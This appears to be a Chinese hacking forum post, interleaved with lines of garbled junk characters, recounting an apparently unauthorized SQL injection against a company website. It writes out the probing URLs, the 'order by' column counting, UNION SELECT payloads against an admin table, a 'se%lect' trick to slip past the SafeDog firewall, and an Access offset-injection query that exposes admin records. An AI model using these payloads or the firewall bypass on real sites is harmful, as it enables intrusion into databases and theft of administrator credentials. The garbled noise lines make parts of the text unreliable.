打开网站,一个企业站。
$ D6 D8 a a6 T: O8 y$ G6 @$ J) f; L3 W/ ]
) n, D4 b, G4 R7 l+ \$ J* c$ c5 }
顺手加个admin0 U& f( h4 p* i/ r
. d5 m2 O4 x7 B4 _7 s6 e& l$ f# U
" `8 [) m4 n" t
默认后台。
. S, o/ c3 j- c回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。5 \, I; g% e. D8 O, x+ ]
- @. _' a W5 \6 j2 M: t3 L0 f: r/ Z' L2 `% G7 Z7 Z5 l
' _! o5 r3 A7 S) P, L
所以就不用御剑扫了,待会直接封IP。& l6 X8 v5 ]8 R
& h& B- Q: l& F' t- P
用order by语句判断是否存在注入。
0 p- R4 w; T$ `5 e3 v9 T# i6 Ihttp://www.xxx.com /product_show.asp?id=997 order by 1" B# ?3 b5 `+ v# b
http://www.xxx.com /product_show.asp?id=997 order by 100
# w/ H s0 h0 g2 i* D' Y& I3 L现在存在注入,经测试后发现是9个字段。) G0 C( i' P( Z# f, C6 B
0 b9 s5 U; ]6 [. y* E2 k接下来进行联合查询,猜是否存在admin表。
6 y9 g+ G# @" N: ^8 i: H9 o7 nhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。6 e; w+ ?# p) S0 j* l, d
/ u/ p+ {" t- U% _6 Z- ~8 W5 \5 ?) ]. T7 H4 ^
& ]. M# n& Z: _* Q( q在select中间加个%,se%lect绕过安全狗。! ?& M6 w2 \0 f
- b! A" ?: N. F/ |
: l/ P$ G. n: C) k2 s" d$ N. }: {发现存在admin表,然后开始手工猜常用的字段。. D5 H* g0 }1 N+ n$ l4 P) C
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。, V5 L5 w7 m9 k
4 o3 c% K Q; o# h! S' ^ `突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。* N' ]; C# H8 G, M# z
& g4 O; T5 M+ L Z
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
' q; g3 \. A; I j0 v) j; Uhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin( M4 X/ u- S8 o0 [7 n
好了,敏感内容出显了。. H k$ z' z5 h9 ~
/ e( J6 o2 ]/ x- K8 Q; v
( F8 {6 Z7 G8 M; |0 G: O$ c; \- Z3 c
|